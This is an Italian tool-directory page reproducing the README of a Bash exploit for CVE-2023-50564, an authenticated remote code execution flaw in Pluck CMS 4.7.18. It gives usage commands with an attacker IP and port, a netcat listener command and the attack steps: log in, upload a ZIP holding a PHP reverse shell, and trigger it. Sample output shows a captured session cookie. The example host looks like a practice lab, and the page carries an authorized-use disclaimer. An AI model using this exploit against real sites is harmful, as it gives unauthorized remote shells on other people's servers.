Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564 — Exploit Bash che automatizza l'esecuzione remota di codice autenticata in Pluck CMS 4.7.18 tramite upload di ZIP dannoso, attivando una reverse shell PHP per CVE-2023-50564. | Kitploit
Strumenti/GitHubGitHub/0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHub0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564

Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564

Exploit Bash che automatizza l'esecuzione remota di codice autenticata in Pluck CMS 4.7.18 tramite upload di ZIP dannoso, attivando una reverse shell PHP per CVE-2023-50564.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
131 anno faNon ancora revisionato
Condividi

CVE-2023-50564 - Pluck CMS v4.7.18 Remote Code Execution (RCE) Exploit

Descrizione

Questo script sfrutta una vulnerabilità di Remote Code Execution (RCE) in Pluck CMS v4.7.18. La vulnerabilità consente a un utente malintenzionato di caricare un file PHP malevolo sul server ed eseguirlo, ottenendo l'esecuzione remota di comandi sulla macchina target.

Lo script automatizza l'intero processo:

  1. Autenticandosi al pannello di amministrazione di Pluck CMS utilizzando le credenziali fornite.
  2. Caricando un file ZIP che contiene uno script PHP malevolo per reverse shell.
  3. Eseguendo la reverse shell PHP, fornendo all'attaccante accesso remoto alla macchina target.

Nota: Lo script richiede un listener Netcat sulla macchina dell'attaccante per ricevere la reverse shell.


Prerequisiti

Prima di eseguire lo script, assicurati di avere:

  • Netcat installato e un listener impostato per ricevere la reverse shell.
  • Il corretto host target, password, indirizzo IP e porta per la reverse shell.
  • Accesso al pannello di amministrazione di Pluck CMS sul target.

Utilizzo

root@kitploit:~
./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <porta>

Argomenti:

  • -h <host>: L'host target (es. greenhorn.htb).
  • -P <password>: La password per il pannello di amministrazione di Pluck CMS (es. abcd123).
  • -i <IP>: L'indirizzo IP dell'attaccante per ricevere la reverse shell.
  • -p <porta>: La porta su cui è in ascolto il listener Netcat per catturare la reverse shell.

Esempio:

root@kitploit:~
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001

Passaggi:

  1. Imposta il listener Netcat: Sulla macchina dell'attaccante, avvia un listener Netcat sulla porta specificata:

    root@kitploit:~
    nc -nvlp <porta>
    

    Ad esempio:

    root@kitploit:~
    nc -nvlp 9001
    
  2. Esegui lo script: Fornisci i parametri richiesti allo script, inclusi host, password, indirizzo IP e porta.

    root@kitploit:~
    ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
    
  3. Esecuzione dello Script:

    • Lo脚本 accede al pannello di amministrazione di Pluck CMS.
    • Carica un file ZIP contenente uno script PHP per reverse shell (love.php).
    • Una volta caricato il file ZIP, la reverse shell viene eseguita sul target e viene stabilita una connessione con il tuo listener Netcat.
    • Verrà mostrato un messaggio pulito: "RCE is waiting for you, please go take a look.", e lo script terminerà dopo aver tracciato il tempo impiegato.
  4. Accedi al Target: Una volta attivata la reverse shell, la connessione apparirà nel tuo listener Netcat, dandoti accesso remoto alla macchina target.


POC

image

Esempio di Output

root@kitploit:~
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.

Requisiti

  • cURL: Per interagire con Pluck CMS e caricare file.
  • Netcat: Per ascoltare la reverse shell.

Puoi installare curl e netcat usando i seguenti comandi se non sono già installati:

Debian/Ubuntu:

root@kitploit:~
sudo apt update
sudo apt install curl netcat

Red Hat/CentOS/Fedora:

root@kitploit:~
sudo yum install curl nc

Disclaimer

Questo script è destinato esclusivamente a scopi educativi e a test di penetrazione autorizzati. L'uso non autorizzato di questo script è illegale e non etico. Ottieni sempre l'autorizzazione appropriata prima di sfruttare qualsiasi vulnerabilità su un sistema.


Risoluzione dei Problemi

  1. 504 Gateway Time-out: Lo script potrebbe incorrere in questo errore durante il tentativo di eseguire la reverse shell, ma ciò non influisce sul successo dell'esecuzione della shell. L'errore è solitamente dovuto al fatto che il server target impiega troppo tempo per rispondere alla richiesta HTTP, ma la shell dovrebbe comunque funzionare.

  2. Problemi con il Listener Netcat: Se non ricevi la reverse shell, assicurati che l'indirizzo IP e la porta siano impostati correttamente e che non ci siano restrizioni firewall che impediscono al target di connettersi alla tua macchina.

  3. Lo Script non Riusce ad Accedere: Se l'accesso al pannello di amministrazione del CMS fallisce, verifica la password fornita e assicurati che il CMS sia accessibile sulla macchina target.


Fammi sapere se desideri ulteriori personalizzazioni o chiarimenti nel README!

Scarica lo strumento